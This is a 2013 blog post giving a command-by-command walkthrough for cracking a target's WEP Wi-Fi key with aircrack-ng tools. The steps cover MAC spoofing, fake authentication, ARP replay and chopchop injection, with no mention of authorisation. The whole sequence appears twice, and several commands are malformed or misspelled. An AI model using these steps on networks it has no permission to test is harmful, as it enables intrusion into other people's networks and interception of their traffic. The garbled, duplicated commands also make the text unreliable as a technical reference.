Tuesday 15 October 2013
Before we begin let's get familiar with these terms
ESSID-access point's name
BSSID:MAC Address
MAC-Unique ID assigned to network interfaces for communications
MAC-Unique ID assigned to network interfaces for communications
First download Backtrack 5.It's got all the tools needed.You can get it from http://www.backtrack-linux.org/downloads/
Open a new command line and type the following commands in direct order
Open a new command line and type the following commands in direct order
airmon-ng
airmon -ng stop (interface)
ifconfig (interface) down macchanger --00:11:22:33:44:55 (interface)
airodump-ng (interface)
Hit Ctrl+C to stop the list
airodump-ng -c(channel) -w (file name) --BSSID (BSSID) (interface)
aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 -e (ESSID) (interface)/aireplay-ng -1 0 -e ESSID -a BSSID -h MAC address interface.
aireplay-ng -3 or 5 -b ( BSSID) -h 00:11:22:33:44:55 (interface)-wlan0
For aircrack:aircrack.ng wep key-01.cap
For monitor mode
airmon-ng <start|stop|check><interference>[channel frequency]
How to perform injection on
aireplay-ng -9(interface)
The AP that sends ping fan be injected
Copy down your targets BSSID,channel & ESSID
aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)
This lets you test specifically,can be useful for verifying hidden SSIDs or alternative BSSIDs
3.Target a specific channel:
airmon-ng start (interface)(channel)
4.Change Mac adress:
airmon-ng stop (interface(s)
ifconfig (interface) down
macchanger--(faked:Mac)(interface)
Copy down faked Mac
5.Begin packet capture:
Using 'aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID)
-h (faked:Mac) (interface)' may help for picky routers
7. ARP replay
* Put in the third shell*
aireplay-ng -3 or 5 -b (BSSID) -h (faked:Mac)(interface)
Where -3 means standard arp request replay
-b .............is the access point MAC address
-h.............is the source MAC address (either an associated client or from fake authentication)
Fake authentification
aireplay-ng -mon0 -1 0 - a (BSSID)
aireplay-ng mon0 -1 6000 -o 1 -p 10 -a (BSSID)
Injection
aireplay-ng mon0 -3 -b (BSSID)
aireplay-ng mon0 -2 -p 0841 -a (BSSID)
Injection(chop chop technique)
aireplay-ng -4 -h (fake MAC address) -b (BSSID) interface
airmon -ng stop (interface)
ifconfig (interface) down macchanger --00:11:22:33:44:55 (interface)
airodump-ng (interface)
Hit Ctrl+C to stop the list
airodump-ng -c(channel) -w (file name) --BSSID (BSSID) (interface)
aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 -e (ESSID) (interface)/aireplay-ng -1 0 -e ESSID -a BSSID -h MAC address interface.
aireplay-ng -3 or 5 -b ( BSSID) -h 00:11:22:33:44:55 (interface)-wlan0
For aircrack:aircrack.ng wep key-01.cap
For monitor mode
airmon-ng <start|stop|check><interference>[channel frequency]
How to perform injection on
aireplay-ng -9(interface)
The AP that sends ping fan be injected
Copy down your targets BSSID,channel & ESSID
aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)
This lets you test specifically,can be useful for verifying hidden SSIDs or alternative BSSIDs
3.Target a specific channel:
airmon-ng start (interface)(channel)
4.Change Mac adress:
airmon-ng stop (interface(s)
ifconfig (interface) down
macchanger--(faked:Mac)(interface)
Copy down faked Mac
5.Begin packet capture:
Using 'aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID)
-h (faked:Mac) (interface)' may help for picky routers
7. ARP replay
* Put in the third shell*
aireplay-ng -3 or 5 -b (BSSID) -h (faked:Mac)(interface)
Where -3 means standard arp request replay
-b .............is the access point MAC address
-h.............is the source MAC address (either an associated client or from fake authentication)
Fake authentification
aireplay-ng -mon0 -1 0 - a (BSSID)
aireplay-ng mon0 -1 6000 -o 1 -p 10 -a (BSSID)
Injection
aireplay-ng mon0 -3 -b (BSSID)
aireplay-ng mon0 -2 -p 0841 -a (BSSID)
Injection(chop chop technique)
aireplay-ng -4 -h (fake MAC address) -b (BSSID) interface
Subscribe to:
Post Comments (Atom)
Popular Posts
-
The Piper Arrow is suitable for small family sizes. Large family sizes can look out for the Dakota. More spacious and ... -
How to play PES 2013 with a low spec machine First of all, these are the specifications to run the software; MINIMUM SYSTEM REQUIRE... -
Two Russian guys named Raskalov And Vadim Makhorov decided to challenge the laws of gravity and death by climbing and filming themselves...
-
Have you ever seen or known a very average looking guy, or even an ugly dude, who is able to date the best-looking girls in town? The tr... -
Free blogger templates downloads, download free blog templates, best free blogger templates and much more are the various branding we see ...
0 comments:
Post a Comment